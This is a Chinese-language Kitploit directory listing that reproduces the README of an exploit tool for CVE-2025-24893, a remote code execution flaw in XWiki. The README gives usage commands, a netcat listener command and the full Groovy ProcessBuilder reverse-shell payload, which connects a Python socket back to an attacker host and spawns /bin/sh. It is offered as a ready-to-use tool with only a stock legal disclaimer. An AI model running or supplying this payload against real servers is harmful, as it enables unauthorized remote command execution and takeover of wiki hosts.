Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-24893 — Modified exploit for CVE-2025-24893 | Kitploit
工具/GitHubGitHub/hackersonsteroids/cve-2025-24893
ExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access ToolPayload Development
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Modified exploit for CVE-2025-24893

查看仓库
51年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24893 XWiki RCE 漏洞利用

Exploit Banner

一个简单的 Python3 脚本,用于利用 CVE-2025-24893(XWiki 平台中的一个远程代码执行漏洞),使用基于 Groovy 的异步宏和可配置的反向 Shell 载荷。

⚠️ 警告: 该工具仅供教育和授权测试目的使用。未经授权针对您不拥有或未经明确许可测试的系统使用是非法且不道德的。


目录

  • 功能特性
  • 需求
  • 安装
  • 使用
  • 检测与协议回退
  • 反向 Shell 载荷
  • 许可证
  • 免责声明

功能特性

  • ✅ 自动检测目标是否支持 HTTPS 或 HTTP
  • ✅ 构建 Groovy ProcessBuilder 片段以避免 Runtime.exec 的怪异行为
  • ✅ 对 XWiki async+groovy 宏载荷进行 URL 编码
  • ✅ 可配置的反向 Shell(主机 + 端口)
  • ✅ 打印 HTTP 响应码以帮助验证投递

需求

  • Python 3.6 或更高
  • requests 库
root@kitploit:~
pip install requests

安装

克隆此仓库:

root@kitploit:~
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893

使用

root@kitploit:~
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
  • <TARGET_DOMAIN> XWiki 主机(例如 wiki.example.local)。

  • <LHOST> 攻击者计算机的 IP(监听器运行的位置)。

  • <LPORT> 监听器端口(整数)。


示例

  1. 在您的计算机上启动一个监听器:
root@kitploit:~
nc -lvnp 4444
  1. 运行利用脚本:
root@kitploit:~
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
  1. 成功时,检查您的 netcat 监听器以获取 Shell。

检测与协议回退

在发送载荷之前,脚本执行以下操作:

  1. 尝试 https://<TARGET_DOMAIN>
  2. 如果 HTTPS 失败,回退到 http://<TARGET_DOMAIN>
  3. 如果两者都不可达则退出

这有助于确保与混合协议部署的兼容性。


反向 Shell 载荷

默认情况下,脚本使用一个 Python3 单行代码:

root@kitploit:~
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
  • 如果需其他 Shell(例如 Bash、Perl、PHP 等),可修改 build_payload() 函数。

许可证

本项目采用 MIT 许可证。详情请参阅 LICENSE 文件。


免责声明

该工具仅供授权安全评估和教育目的使用。作者对滥用不承担任何责任。在测试任何目标系统之前,务必获得明确许可。

下载工具